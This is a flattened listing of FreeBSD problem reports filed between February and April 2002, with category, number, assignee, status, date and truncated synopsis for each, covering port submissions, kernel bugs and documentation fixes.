kern/34965 4.4, 4.5 freeze at boot time on ASUS P2B f [2002/02/15] ports/34975 ports mplayer don't compile with divx codec o [2002/02/15] ports/34981 ports new port: misc/bibletime: biblestudy appl o [2002/02/15] ports/34985 ports New port: net/ldapdiff A utility to patch o [2002/02/15] ports/34987 portmgr bsd.port.mk: silence awk's warning o [2002/02/15] ports/34991 ports New port: durep (displays disk usage in a f [2002/02/16] ports/34997 ports xf86cfg core dumps o [2002/02/16] ports/34999 ports New Port: QScheme scheme interpretor f [2002/02/16] ports/35006 ports New port archivers/arj: ARJ32 v 3.10 file o [2002/02/16] ports/35007 ports New port archivers/arj: ARJ32 v 3.10 russ o [2002/02/16] kern/35010 pcm0 fails to attach with Intel 82801BA ( a [2002/02/16] docs/35011 doc There are no commands called "diskless" o o [2002/02/16] bin/35018 brian enhancing daily/460.status-mail-rejects o [2002/02/17] ports/35037 ports New port: sysutils/cfengine-devel o [2002/02/17] ports/35038 ports cleanup pkg-plist for x11-toolkits/Xaw3d o [2002/02/17] ports/35060 ports New port: deskmenu (GTK root menu applica o [2002/02/17] ports/35062 ports New Port: audio/xmms-mailnotify 0.2.0 o [2002/02/17] kern/35064 ACPI not work with Epox 8KHA+ motherboard o [2002/02/17] bin/35070 math(3) references section "3m", etc. o [2002/02/18] i386/35078 Uninitialized pointer dereference in func o [2002/02/18] ports/35092 ports Xterm termcap should have color capabilit o [2002/02/18] bin/35099 sobomax ldd in -STABLE fails on libc. o [2002/02/18] i386/35101 chern cvusupit and other packages won't extract o [2002/02/18] ports/35102 ports New port: Ultima IV engine o [2002/02/19] bin/35109 [PATCH] games/morse: add ability to decod o [2002/02/19] bin/35113 grdc enhancement: countdown timer mode o [2002/02/19] ports/35117 ports Undefined symbol "ldap_get_dn" when tryin o [2002/02/19] i386/35124 No mouse with FreeBSD 4.5 with ECS K7S5a f [2002/02/19] misc/35130 bmah Example dd command for making 4.x install o [2002/02/19] ports/35131 ports New port: unittest framework for c o [2002/02/20] ports/35146 ports New port: A Unit testing framework for Ad o [2002/02/20] bin/35148 ppp/nat-problems after cvs update 4.3 -> o [2002/02/20] gnu/35156 obrien suggestion: hard link /usr/bin/awk to /us o [2002/02/20] ports/35165 ports New port: textproc/smart an information r o [2002/02/20] kern/35171 Moused needs to be enabled to run a USB m o [2002/02/21] misc/35172 Please update am-utils(amd) into newer ve o [2002/02/21] kern/35175 ptrace(PT_DETACH, ....) doesn't do signal o [2002/02/21] ports/35177 chuckr math/gnuplot missing WITHOUT_X11 option o [2002/02/21] conf/35178 ipfilter for IPV6 not availlable in rc.* o [2002/02/21] i386/35182 APMD does not set close on exec for /dev/ o [2002/02/21] ports/35187 ports New port: xmlada - an xml processing libr o [2002/02/21] ports/35190 ports New Port: autoproject o [2002/02/21] ports/35192 kuriyama ports/net/net-snmp garbles /usr/local/sha o [2002/02/21] kern/35195 msync performance on large files o [2002/02/21] ports/35197 dirk [PATCH] fix "auto-crash" build failure on o [2002/02/21] bin/35201 link and unlink are not SUSv2-compliant a o [2002/02/22] ports/35204 dirk www/mod_php4 with xslt is not LOCALBASE c o [2002/02/22] ports/35205 ports New port: russian/mtc - Multifile text En o [2002/02/22] ports/35221 kde kdenetwork2 won't compile o [2002/02/22] docs/35222 doc mailing list archive URL regexp suboptima o [2002/02/22] bin/35226 mtree - strange behaviour on some filenam o [2002/02/23] kern/35234 World access to /dev/pass? (for scanner) o [2002/02/23] conf/35240 Update to etc/services o [2002/02/23] conf/35242 Change to etc/periodic/weekly/330.catman o [2002/02/23] ports/35244 ports proper fix for x11-fm/endeavour's strcase f [2002/02/23] misc/35245 brian unwanted stealth behaviour (inbound icmp o [2002/02/23] ports/35249 ports no man page for latex2html o [2002/02/23] conf/35262 Generation of boot block for headless ope o [2002/02/23] ports/35266 lioux New port: LimeWire o [2002/02/23] kern/35269 possible panics with 4:1 filesystem ratio o [2002/02/23] ports/35270 ports converters/p5-Convert-TNEF has wrong pkg- o [2002/02/24] docs/35280 doc [PATCH] null-modem cable pinout in 'Seria o [2002/02/24] ports/35285 ports New port textproc/prosper: a LaTeX class o [2002/02/24] kern/35289 Brooktree device doesnt properly signal a o [2002/02/24] ports/35298 ports New port: biology/primer3 o [2002/02/24] ports/35303 ports New port: gimp-print, print drivers for C o [2002/02/25] kern/35324 Plug and Play probe fails to configure Di o [2002/02/25] ports/35330 ports New port: biology/wise o [2002/02/25] ports/35332 ports New port: biology/flip s [2002/02/25] bin/35333 send-pr(1) vim syntax highlighting suppor o [2002/02/25] ports/35334 ports Please add md2k driver to print/ghostscri o [2002/02/26] docs/35343 doc Old broken Unix docco Makefiles o [2002/02/26] ports/35355 ports New port: databases/gbib f [2002/02/27] ports/35372 ports pgp6 ports fails to compile on alpha plat o [2002/02/27] ports/35375 kde x11/kdebase2 creates files not listed in o [2002/02/27] kern/35377 process gets unkillable (-9) in "ttywai" o [2002/02/27] docs/35378 doc Handbook has inaccurate description of f o [2002/02/27] misc/35381 incorrect floating-point display of large o [2002/02/27] ports/35383 ports new port DarwinStreamingServer o [2002/02/27] kern/35392 atapi tape driver does not maintain devic o [2002/02/27] bin/35393 Patch to add STANDARDS section to strerro o [2002/02/28] misc/35400 sysinstall could improve manipulation of a [2002/02/28] ports/35406 ports New port submission o [2002/02/28] docs/35436 doc PAO isn't very latest-and-greatest these o [2002/03/01] ports/35447 ports Update port: databases/p5-SQL-Statement t o [2002/03/01] bin/35451 PATCH: pkg_add -r able to save local copy o [2002/03/01] bin/35454 mtree can't handle symlinks referencing f o [2002/03/01] ports/35456 portmgr [PATCH] Add a distfiles-list target o [2002/03/01] conf/35457 dual boot problem from 2 different SCSI d s [2002/03/01] ports/35459 ports portupgrade doesn't clean up dependencies o [2002/03/01] kern/35463 [patch] wi(4) doesn't comprehend standard o [2002/03/02] ports/35479 ports New Port: A small stand-alone program for o [2002/03/02] ports/35481 ports New port: console text editor looks like o [2002/03/02] docs/35491 green sshd(8) has an incorrect path o [2002/03/02] bin/35505 [PATCH] Feature enhancement for sed(1) o [2002/03/03] kern/35512 ATA/ATAPI CD driver: impossible to set cd o [2002/03/03] ports/35514 portmgr Use the value of hw.machine_arch instead o [2002/03/03] ports/35520 ports New port devel/whups: a web-based bug tra a [2002/03/03] bin/35521 nsupdate fails if destination dns is not o [2002/03/03] ports/35522 ports xhtml port uses SGMLDECL in catalog chain o [2002/03/03] docs/35523 doc manpage fixes for df(1) and ls(1) o [2002/03/03] ports/35525 ports update-port: graphics/jpeg2ps-letter o [2002/03/03] i386/35526 No mouse recognized in Compaq Presario la o [2002/03/04] misc/35542 bde BDECFLAGS needs -U__STRICT_ANSI__ o [2002/03/04] conf/35545 Enhanced periodic scripts o [2002/03/04] ports/35549 sada new port editors/texmacs doesn't build on o [2002/03/05] ports/35565 des audio/mpg123 fails to write to WAV files o [2002/03/05] ports/35566 ports new ports: Lire a multiple log files anal o [2002/03/05] ports/35567 ports update port: databases/dbconnect o [2002/03/05] bin/35568 make declares target out of date, but $? o [2002/03/05] docs/35575 doc Pw(8) man page makes no mention of /var/l o [2002/03/05] ports/35578 lkoeller mail/faces: make NAS default since xfaces o [2002/03/05] ports/35580 ports Starup script in /usr/local/etc/rc.d is i o [2002/03/06] ports/35594 ports Bug: misc/kwatch fails to build if autoco f [2002/03/06] i386/35599 murray install o [2002/03/06] docs/35602 doc dump(8)/restore(8) pages don't explain "a o [2002/03/06] docs/35603 doc grep(1) page is missing info on zfgrep, z o [2002/03/06] docs/35605 doc chmod(1) page misleads by use of "regardl o [2002/03/06] docs/35607 doc dump(1) page needs discussion of scary er o [2002/03/06] docs/35608 doc mt(1) page uses "setmark" without explana o [2002/03/06] docs/35609 doc mt(1) page needs explanation of "long era o [2002/03/06] docs/35612 doc ps(1) page "state" description doesn't me o [2002/03/06] ports/35617 lkoeller mail/faces: add USE_SOX, WITHOUT_AUDIO kn o [2002/03/07] kern/35635 sheldonh [patch] missing dep in libiconv prevents o [2002/03/07] ports/35638 markm tn3270 dumps core unconditionally o [2002/03/07] ports/35639 ports executable name conflicts: ploticus and s o [2002/03/07] docs/35642 doc lo(4) page maybe should document optional o [2002/03/07] docs/35644 doc lo(4) page presumes familiarity with prin o [2002/03/07] docs/35646 doc cp(1) page needs a "Bugs" section. o [2002/03/07] docs/35647 doc www; combine query-by-number and multi-fi o [2002/03/07] docs/35648 doc rc.conf; add note about "flags" to both f o [2002/03/07] docs/35649 doc mount_smbfs(8) page: "See ./examples/dot. o [2002/03/07] docs/35652 doc bsd.README seriously obsolete o [2002/03/07] ports/35657 jmz The language in Brazil is portuguese, not o [2002/03/07] ports/35661 ports new port: mycb o [2002/03/07] ports/35666 portmgr new bsd.port.mk support for GCC 2.95 and o [2002/03/08] ports/35667 ports net/pppload patch so it doesn't show wron o [2002/03/08] ports/35668 ports Link sqsh with readline o [2002/03/08] ports/35670 ports /usr/ports/databases/sqsh - bogus depende o [2002/03/08] bin/35671 wrong comments in rc.diskless1 o [2002/03/08] ports/35682 ports apache13-ssl needs update o [2002/03/08] docs/35686 doc blackhole(4) page seems to contradict its o [2002/03/08] docs/35687 doc /etc/nsmb.conf missing mention of readers o [2002/03/08] docs/35696 doc mount_smbfs(8) references a nonexistent n o [2002/03/08] kern/35699 [PATCH] msdosfs: differrent masks for dir o [2002/03/08] kern/35700 a small code update o [2002/03/09] ports/35708 ports New port: audio/abcmidi utilities for abc o [2002/03/09] ports/35710 portmgr Request repocopy: devel/automake -> devel o [2002/03/09] docs/35711 des the "gnats page" should move to its own s o [2002/03/09] bin/35717 which(1) returns wrong exit status for m o [2002/03/09] bin/35718 which(1) command does not handle file nam o [2002/03/09] bin/35719 which(1) ignore empty components of $PATH o [2002/03/09] misc/35727 man(1) program should not display (old) d o [2002/03/10] docs/35732 doc adduser(8) page has obsolete reference an o [2002/03/10] ports/35737 ports New port: audio/abcselect - extract part o [2002/03/10] ports/35753 ports New Port: biology/act o [2002/03/10] ports/35762 ports Speak Freely hangs while reading from aud o [2002/03/11] misc/35764 Icewm does not display APM status properl o [2002/03/11] ports/35767 portmgr make_index script does not deal with syml o [2002/03/11] bin/35769 w does not correctly interpret X sessions o [2002/03/11] misc/35770 Why there is no /usr/local/bin in PATH va o [2002/03/11] ports/35779 kde bug: x11-toolkits/qt23 does not know zh_C f [2002/03/11] ports/35784 ports reposting pic2fig port as a diff against o [2002/03/11] docs/35800 obrien [PATCH] removal of -kthread in gcc man pa o [2002/03/11] bin/35812 strings(1) does'n print russian character o [2002/03/11] kern/35813 dwmalone Add another Askey ISA modem o [2002/03/12] ports/35819 demon Update russian/apache13-modssl to apache- o [2002/03/12] docs/35823 doc [PATCH] Little Restructuring of the Devel o [2002/03/12] ports/35833 ports ports/chinese/arphicttf and CJK depend on o [2002/03/12] bin/35838 Change to size of WID_IF in usr.bin/netst o [2002/03/13] kern/35846 timeout in wi_cmd 11, machine hangs for a o [2002/03/13] ports/35859 ports New port: Network traffic accounting daem o [2002/03/13] kern/35861 brooks if_vlan module is compiled with ZERO vlan o [2002/03/13] ports/35864 ports ports with invalid dependencies to glib13 o [2002/03/13] misc/35865 pam_krb5 crashes in pam_sm_setcred() o [2002/03/13] kern/35876 bus_dmamem_free does not call contigfree o [2002/03/13] ports/35879 portmgr autoconf-2.52_2 creates empty case/esac s o [2002/03/13] ports/35882 ports Perl Expect module send_slow hangs on EOF o [2002/03/13] kern/35883 probe for ATI Rage128 Pro o [2002/03/14] bin/35886 [patch] Enhancement: custom time format f o [2002/03/14] bin/35894 bbraun popen.c in cron won't build without LOGIN o [2002/03/14] ports/35897 ports upgrading the linux_base port runs into t o [2002/03/14] kern/35900 Changing RealTek 8139 MAC address fails f [2002/03/14] misc/35918 Xset , XTGA and Xhtml Damaged o [2002/03/14] ports/35919 ports CompuPic 5.1.1016 o [2002/03/15] ports/35927 portmgr Permission sought to commit this automake o [2002/03/15] ports/35937 ports New port: taipan-0.9 o [2002/03/15] docs/35939 doc ipfw(8) needs explicit statement about no o [2002/03/15] docs/35941 doc cd(4) manual doesn't mention "target" use o [2002/03/15] docs/35942 doc at(1) manual doesn't describe at.allow an o [2002/03/15] docs/35943 doc at(1) config files are misplaced in /var/ o [2002/03/15] ports/35946 ports The /usr/local/lib/RealPlayer8/postinstal o [2002/03/15] docs/35948 trhodes disklabel(8) manual uses archaic "pack" a a [2002/03/15] docs/35951 trhodes disklabel(8) manual confuses partitions a o [2002/03/15] docs/35953 doc hosts.equiv(5) manual is confusing or wro o [2002/03/15] ports/35966 nakai Update port: x11-wm/qvwm to 1.1.12 o [2002/03/15] docs/35967 doc rc.conf(5) manual missing "dumpdir" and " o [2002/03/16] kern/35978 improve kobj method dispatch o [2002/03/16] kern/35988 Seimens SpeedStream PCI/PCMCI Adaptor for o [2002/03/16] kern/35993 murray sys/dev/amr/amr.c - Compiler warnings und o [2002/03/16] ports/35995 ports New port: ophoto o [2002/03/16] kern/35999 add support for general flash disks to sc o [2002/03/17] bin/36000 contrib/amd uses mktemp o [2002/03/17] kern/36007 [PATCH] USB memory card reader/writer RD5 o [2002/03/17] ports/36020 jmz Update port: print/musixtex T.98 -> T.104 o [2002/03/17] ports/36024 sobomax port update: OpenJIT 1.1.16 for JDK 1.3.1 o [2002/03/17] ports/36026 steve Update port: x11-toolkits/open-motif to 2 o [2002/03/17] ports/36034 ports new port databases/pg-crypto o [2002/03/18] ports/36047 znerd New port java/jbuilder-personal o [2002/03/18] docs/36055 doc [PATCH] adding some help-yourself-info to o [2002/03/18] ports/36061 ports New port: net/jmsn s [2002/03/18] standards/36076standardsImplementation of POSIX fuser command o [2002/03/18] ports/36078 portmgr Fix MASTER_SITES_NN recursive bug o [2002/03/18] ports/36079 portmgr Support USE_LESSTIF=yes o [2002/03/18] ports/36080 portmgr Support USE_OPENSSL=yes on 4.2 o [2002/03/18] ports/36083 portmgr Installs existing packages for dependecie o [2002/03/19] standards/36087tjr P1003.1-2001 c99 utility o [2002/03/19] ports/36089 ports new port: net/isba - a Perl/Tk GUI for ip o [2002/03/19] misc/36110 dmesg output corrupt if /dev/console is b o [2002/03/19] ports/36112 portmgr [PATCH] New feature for whole ports tree: o [2002/03/19] ports/36113 dirk Add gdbm, BerkeleyDB2, BerkeleyDB3, libio o [2002/03/19] conf/36118 re 4.5 Upgrade says it won't touch /usr/src, s [2002/03/19] ports/36119 dinoex openssh 3.1_4 undefined references with S p [2002/03/19] standards/36128tjr Reimplementation of who utility o [2002/03/20] ports/36129 ports Update Port:databases/libiodbc(support pt p [2002/03/20] standards/36130standardsP1003.2 asa utility is missing o [2002/03/20] bin/36136 savecore -z option does not work o [2002/03/20] misc/36143 Dynamic (non linear) mouse acceleration a o [2002/03/20] misc/36153 /usr/src/games/fortune/README instruction o [2002/03/20] misc/36154 Getting USB mouse to work: usbd and mouse o [2002/03/21] ports/36162 ports New Port: p5-IO-Socket-Multicast o [2002/03/21] misc/36165 boehm-gc BUS error with gdb o [2002/03/21] kern/36170 an(4) does an_init() even if interface is o [2002/03/21] ports/36178 ports New Port: bozohttpd-0.59 o [2002/03/21] ports/36186 ports New Port: www6to4 version 1.5 o [2002/03/21] bin/36189 [ftpd] it can not send a file on NTFS in p [2002/03/21] standards/36190tjr P1003.1-2001 newgrp command f [2002/03/22] ports/36202 wosch update to sysutils/socket: NetBSD IPv6 pa f [2002/03/23] conf/36230 ipfw traffic shaper with DHCP env. o [2002/03/23] ports/36238 sf [patch] ftp/wget doesn't respect FTP_PASS o [2002/03/24] misc/36250 grog /dev/vinum device entries have a group of o [2002/03/24] ports/36251 ports New port: lang/cocor (Coco/R, a compiler a [2002/03/24] ports/36252 petef Fix build of misc/Howto / take maintainer o [2002/03/24] ports/36260 sobomax freetype2 needs libintl.so.1 in gettext-0 o [2002/03/24] bin/36262 [PATCH] Fixed rusers idle-time reporting o [2002/03/24] kern/36274 75GXP drive ATA tagging failure makes df o [2002/03/26] alpha/36327 alpha trap within cvt() while attempting to pri o [2002/03/26] kern/36330 ``device ed'' missing from the LINT confi o [2002/03/26] ports/36336 ports port of ccmalloc o [2002/03/26] ports/36341 dburr [patch] devel/SN marked as broken o [2002/03/26] ports/36345 ports New port: unrtf - converter from RTF to H o [2002/03/26] ports/36355 ports xmcd port uses CDDB instead of FreeDB o [2002/03/26] misc/36359 fxp driver and Intel Pro/100 S NIC (0002B o [2002/03/26] ports/36361 ports apache13-ssl installs 'httpsd.conf' and l o [2002/03/26] ports/36364 ports apache13-ssl - 'make certificate' fails o [2002/03/27] misc/36368 sshd error: session_close_by_channel: ki o [2002/03/27] kern/36373 [PATCH] Introduction of non-strict IFF_NO o [2002/03/27] bin/36374 Patch (against core dumps) and improvemet o [2002/03/27] ports/36380 ports new port: emulators/grustibus o [2002/03/27] kern/36381 ata + hw.ata.wc=1: high CPU load for larg o [2002/03/27] bin/36383 sed misbehaves with 2044 char substitute o [2002/03/27] misc/36385 luigi crunchgen does not handle Makefiles with o [2002/03/27] ports/36386 adrian www/squid24 might overwrite perms on log o [2002/03/27] misc/36392 cron starts before vi recover, and vi rec o [2002/03/27] bin/36397 sos incorrect information in ata(4) o [2002/03/27] kern/36410 Bad mac address return from FNW-9803-T (A o [2002/03/28] conf/36416 imp Addition to /etc/defaults/pccard.conf o [2002/03/28] bin/36418 imp pccardd added option to exit after probe o [2002/03/28] kern/36425 bump up SYS_NMLN in sys/utsname.h o [2002/03/28] bin/36431 src/secure/lib/libtelnet fails in CURRENT o [2002/03/28] docs/36432 doc Proposal for doc/share/mk: make folded bo o [2002/03/28] docs/36449 doc symlink(7) manual doesn't mention trailin s [2002/03/28] ports/36452 ports Update port: security/fwlogwatch to 0.7 o [2002/03/28] docs/36459 doc tftp(1) manual's "get" syntax/description o [2002/03/28] gnu/36460 cu(1) program does not work very well. o [2002/03/28] docs/36464 doc diff(1) manual doesn't explain "=format". f [2002/03/28] ports/36466 cy please remove biology/seaview o [2002/03/28] bin/36470 dwmalone chpass(1) program has erroneous "usage" f o [2002/03/29] bin/36477 gshapiro mailwrapper doesn't handle rmail calls o [2002/03/29] ports/36490 ports Update port mail/smail to 3.2.0.112 o [2002/03/29] bin/36501 /usr/bin/calendar can't handle recurring o [2002/03/29] ports/36503 ports several files conflict in ports/databases o [2002/03/29] docs/36524 doc bad links on handbook index page f [2002/03/30] ports/36531 ports let eterm with chinese support o [2002/03/30] misc/36536 Apparent mother board incompatability o [2002/03/30] misc/36541 portmgr port: make install as normal user retries o [2002/03/30] ports/36543 ports New port: noip updater v1.6 o [2002/03/30] ports/36545 ports mwrite is an absolute symbolic link to /u o [2002/03/30] bin/36553 Two new features in newsyslog(8) o [2002/03/30] misc/36556 patch: regular expressions for tcpwrapper o [2002/03/30] ports/36557 ports Fix port: security/py-amkCrypto (to refle o [2002/03/30] ports/36560 ports bug fix for the eperl package o [2002/03/30] ports/36561 nakai slib package bug fix o [2002/03/30] bin/36564 fdisk(8) program has misplaced NOT_NOW bl o [2002/03/31] ports/36568 vanilla New port: chinese/chinput3 o [2002/03/31] kern/36569 umass fails when RiteLink Pocket Disk is o [2002/03/31] ports/36575 hoek Update port: converters/uudeview|converte o [2002/03/31] ports/36582 taoka Update port: japanese_kinput2-freewnn to o [2002/03/31] ports/36587 des news/inn{-stable} do not install when --e o [2002/04/01] docs/36618 doc [PATCH] Chapter Storage: bad link to mkis o [2002/04/01] ports/36619 ports A gtk SMB share browser o [2002/04/01] ports/36622 dburr [patch] devel/SN : Upgrade port to versio o [2002/04/01] bin/36626 login_cap(3) incorrectly claims that all o [2002/04/01] docs/36628 doc header an footer of openssl manpages are o [2002/04/01] docs/36629 kris OpenSSL manpages should be reachable with o [2002/04/01] bin/36634 murray dhclient is quiet and cannot be made loud f [2002/04/01] ports/36640 kde bug: building deskutils/kdepim fails in - o [2002/04/01] ports/36644 ports new port -- gtkspell o [2002/04/01] misc/36646 dwmalone [PATCH] Top does not work correctly in a o [2002/04/02] bin/36671 /bin/sh problems with grouped pipe and ou o [2002/04/02] ports/36681 ports New port: streamtuner, a Perl/GTK+ SHOUTc o [2002/04/02] kern/36682 USB isochroneous transfer doesn't report o [2002/04/02] ports/36684 ports patch for http://www.freebsd.org/cgi/quer o [2002/04/02] ports/36685 ports annoying warnings from mc with tcsh in ho o [2002/04/03] ports/36691 ports ports/devel/libformat has a checksum erro o [2002/04/03] kern/36692 Patch for E-Tech ISA PnP modem support o [2002/04/03] ports/36709 portmgr bsd.port.mk MASTER_SITES:n - add comma op o [2002/04/03] docs/36723 doc IPSec section is unintelligible o [2002/04/03] docs/36724 doc ipnat(5) manpage grammar is incomplete an o [2002/04/03] docs/36725 doc Handbook does not talk about FFS Snapshot o [2002/04/03] docs/36726 doc Handbook lacks information about hardware o [2002/04/03] docs/36727 trhodes Mail chapter of Handbook is incomplete o [2002/04/03] docs/36728 doc Handbook does not document VINUM o [2002/04/03] docs/36729 doc Handbook does not document non-sendmail M o [2002/04/04] ports/36734 ports security/vlog minor description issue o [2002/04/04] bin/36740 make ps obey locale (particularly for tim o [2002/04/04] bin/36757 EnhancementRequest binary which ought to o [2002/04/04] ports/36766 portmgr Incompatibility between autoconf, automak o [2002/04/05] bin/36785 Add support for $ character in usernames o [2002/04/05] bin/36786 make ps use 24-hour time by default o [2002/04/05] ports/36791 ports New port: devel/py-logging o [2002/04/05] ports/36792 ports Fix pkg-plist of shells/perlsh o [2002/04/05] ports/36795 kuriyama DocBook DSSSL stylesheets should install o [2002/04/05] ports/36801 ports Update port: misc/compat3x o [2002/04/05] ports/36802 ports Update port: misc/compat4x o [2002/04/05] ports/36806 portmgr bsd.port.mk MASTER_SITES:n group protecti o [2002/04/06] ports/36828 sobomax Mesa3 port broken when using XFREE86_VERS o [2002/04/06] ports/36832 ports apache13-* coredumps when using XML::Pars o [2002/04/06] docs/36837 doc Handbook lacks information about setting o [2002/04/07] ports/36841 ports use of .MAKEFLAGS target in Makefile.loca o [2002/04/07] kern/36845 Add ioctls CDRIOCREADSPEED/WRITESPEED to o [2002/04/07] ports/36849 cy FVWM-Themes fails to switch themes f [2002/04/07] bin/36859 sos burncd fails in dao mode for audio o [2002/04/08] ports/36869 kuriyama Port update: palm/palmos-sdk a [2002/04/08] misc/36881 sound VIA VT82C688A problem, no sound o [2002/04/08] bin/36884 add support id_rsa (OpenSSH/RSA2) authent o [2002/04/08] ports/36887 tobez Update port: www/p5-CGI.pm 2.753 to 2.80 o [2002/04/08] ports/36901 glewis WITHOUT_X11 Knob for port java/jdk13 o [2002/04/08] bin/36902 [patch] proposed new format code %N for s o [2002/04/08] ports/36913 ports New port: devel/ruby-rbprof o [2002/04/08] misc/36916 DOS active partition flag lost in libdisk o [2002/04/09] ports/36918 ports Update to ports/misc/uf-view o [2002/04/09] ports/36919 ports Update to ports/misc/uf-view f [2002/04/09] misc/36923 fdesc file system (partially) crashes Fre o [2002/04/09] ports/36931 ports New port converters/p5-Unicode-Map o [2002/04/09] ports/36932 ports New Port: scmxx 0.6.0 (Data Exchange util o [2002/04/09] ports/36933 portmgr [PATHCES] New feature for pkg_create and o [2002/04/09] ports/36939 ports New Port: devel/popenhs -- A popen-like l o [2002/04/09] ports/36940 ports Port update acid-0.9.6b20 to acid-0.9.6b2 o [2002/04/09] ports/36945 ports new ports of libsigc++12 and gtkmm o [2002/04/09] ports/36947 ports New Port: lcrzo network library Fixed o [2002/04/09] ports/36948 ports New Port: lcrzoex, network testing toolbo o [2002/04/09] ports/36951 glewis Java (aka 1.3.1-p6-root-020405-00:26) cor o [2002/04/09] kern/36952 ldd comand of linux does not work o [2002/04/09] bin/36955 Stock ftpd does not reuse ports in passiv o [2002/04/10] ports/36956 ports linux-dri doesn't reflect the change to X o [2002/04/10] ports/36959 ports New port: Gnewtellium is yet another new o [2002/04/10] bin/36960 calendar doesn't effect -t option. o [2002/04/10] ports/36962 ports new version of news/aub o [2002/04/10] ports/36967 ports New port: news/slrnface o [2002/04/10] ports/36971 ports New port: news/cleanscore o [2002/04/10] ports/36982 ports Update Port: (graphics/gliv) to 1.5.1 fol o [2002/04/10] kern/36983 CD9660 unicode to utf-8 [hack] o [2002/04/10] ports/36987 ports Update Port: robocode to 1.0 follow ups p o [2002/04/10] ports/36989 ports Update Port: (ports/graphics/gdal) to 1.1 o [2002/04/11] conf/36990 pccard I/O DATA PCET10-CL worked o [2002/04/11] ports/36994 ports New port: textproc/py-plex o [2002/04/11] ports/36995 ports New port: devel/pyrex o [2002/04/11] ports/37000 ports New Port: agqt 0.9.1 (Audiogalaxy query t o [2002/04/11] ports/37002 ports Port Update: (security/fwlogwatch) from 0 o [2002/04/11] ports/37003 ports new port: misc/susv2 (Single UNIX Specifi o [2002/04/11] ports/37004 ports new port: misc/susv3 (Single UNIX Specifi o [2002/04/11] bin/37013 ls directory name output trailing slash d f [2002/04/12] ports/37019 ports New port: poink 1.5 (Nosuid, secure ping o [2002/04/12] ports/37020 ports New port: www/muwi o [2002/04/12] ports/37023 obrien editors/vim misses the (optional) depende o [2002/04/12] ports/37027 ports New port: lookout-1.1 (Outlook 97 address o [2002/04/12] ports/37028 ports New port: www/scgi o [2002/04/13] misc/37034 Fixed maximum character length in EUC o [2002/04/13] docs/37037 keramida Cleaned and revised the Hubs article o [2002/04/13] ports/37044 ports lesstif needs an update o [2002/04/13] misc/37047 brian daily_status_mailq_shorten doesn't produc o [2002/04/13] ports/37050 ports New port: audio/py-id3 o [2002/04/13] kern/37052 Quirk: ADS Tech Drive Kit 2.0 USB DA_Q_N o [2002/04/14] ports/37054 ports Problem report: (misc/flexbackup) doesnt o [2002/04/14] ports/37059 ports New port: gtk-iminc o [2002/04/14] ports/37062 ports New port: textproc/pocketreader o [2002/04/14] ports/37066 ports ports/databases/postgresql-tcltk is not u o [2002/04/14] misc/37073 Few new tips for FreeBSD-tips fortune o [2002/04/14] bin/37074 [PATCH] Typographical error in output of o [2002/04/14] bin/37079 des fetch complains about "size of remote fil o [2002/04/14] bin/37083 small improvement to talk(1): add clocks o [2002/04/15] ports/37095 ports ports/net/p5-Net-SSH-Perl already builds o [2002/04/15] bin/37096 Fixes to fsdb command-line handling [patc o [2002/04/15] ports/37098 nakai Update patches for slib port f [2002/04/15] ports/37100 ports Maintainer update: textproc/dico (portsur o [2002/04/15] ports/37111 ports new port: net/ccmsn o [2002/04/15] ports/37123 ports New port: net/arpd o [2002/04/15] kern/37127 doc make in /sys/boot/i386/boot2 and in /sys/ o [2002/04/15] ports/37128 ports New port: www/sarg, formerly known as www o [2002/04/16] i386/37137 FreeBSD install doesn't recognize version p [2002/04/16] ports/37139 ports ports/graphics/miniscrib is not found on o [2002/04/16] misc/37160 qa /stand/sysinstall coredumps when trying t o [2002/04/16] misc/37161 ext2 linux file system, error handling la p [2002/04/17] docs/37175 ru minor errors in two man pages o [2002/04/17] docs/37176 ru similar nits in assorted man pages o [2002/04/17] ports/37185 ports New Port: nrpep (netsaint remote plugin e f [2002/04/17] ports/37186 ade Dbview contains an error, because of whic o [2002/04/17] ports/37187 mita ports/japanese/vfghostscript font-2.6.2 f o [2002/04/17] ports/37195 ports New port: deskutils/mencal p [2002/04/17] i386/37212 ru make.conf/bsd.cpu.mk: i486 does not set - o [2002/04/17] ports/37215 ports LablGL port: An OpenGL interface for Obje o [2002/04/17] ports/37216 ports new LablGTK port: A GTK+ interface for Ob o [2002/04/18] misc/37219 [it_IT locale] LC_TIME, weekday names o [2002/04/18] docs/37221 doc obsolete reference to seqpacket in mount_ o [2002/04/18] ports/37226 mita ports/japanese/vfghostscript5 doesn't fin o [2002/04/18] kern/37227 VMWare do not work with raw disks due to o [2002/04/18] ports/37232 ports New port: sysutils/py-quota o [2002/04/19] misc/37244 ports c2lib port includes vector.h which appare o [2002/04/19] bin/37245 OpenSSH -R port forwarding works with ssh o [2002/04/19] bin/37250 [PATCH] ftpd(8) cannot delete stale symli o [2002/04/19] ports/37255 ports New port: chinese/cce o [2002/04/20] ports/37289 flathill Update net/micq to 0.4.8.pl3 o [2002/04/20] ports/37290 ports New port: tool for setting the title of x o [2002/04/20] ports/37298 ports New port: security/cp2fwb o [2002/04/20] misc/37301 4.5 rc.firewall type simple does not pass o [2002/04/21] conf/37310 add inode information into daily_status_d o [2002/04/21] docs/37322 doc broken link in usb(4) on-line manual o [2002/04/22] bin/37334 phk fix jail.8 instructions for creating jail o [2002/04/22] ports/37337 portmgr [repo-copy request] converters/mule-ucs-e o [2002/04/22] ports/37342 ambrisko ports/misc/airoflash fetches source every o [2002/04/22] kern/37347 _POSIX_THREADS defined but sysconf(_SC_TH o [2002/04/22] ports/37354 ports New port: Perl-compatible regexp for Ocam o [2002/04/22] ports/37359 ports New port: games/bsp - A node builder for o [2002/04/22] ports/37362 ports The Ted port is incompatible with FreeBSD o [2002/04/22] ports/37364 ports New Port: GeekLog o [2002/04/23] ports/37366 kde kdeutils-3.0: kdepasswd truncates passwor o [2002/04/23] ports/37367 ports palm/plucker: fix build problem when late o [2002/04/23] kern/37374 joe [PATCH] closing ums0 blocks with wmesg uh o [2002/04/23] kern/37378 scsi [PATCH] No 6-byte-read on Wincan USB pen o [2002/04/23] i386/37379 /dev/MAKEDEV entry for RocketPort is brok o [2002/04/23] misc/37380 boot0 partition list is outdated (patch i o [2002/04/23] ports/37386 ports update port: security/amavis-perl o [2002/04/23] misc/37387 bsdmainutils/calendar Hungarian addon fil o [2002/04/23] ports/37389 ports Port Update o [2002/04/23] conf/37395 peter even with NO_SENDMAIL=true, /usr/sbin/sen o [2002/04/23] conf/37404 delayed mouse response to draw box or hig o [2002/04/23] kern/37405 Support for Mitsumi USB Mouse with Memory o [2002/04/24] ports/37406 znerd New port: jdictionary 1.2 platform indepe o [2002/04/24] ports/37409 znerd New port: jdictionary-eng-hun 1.2 - Hunga o [2002/04/24] 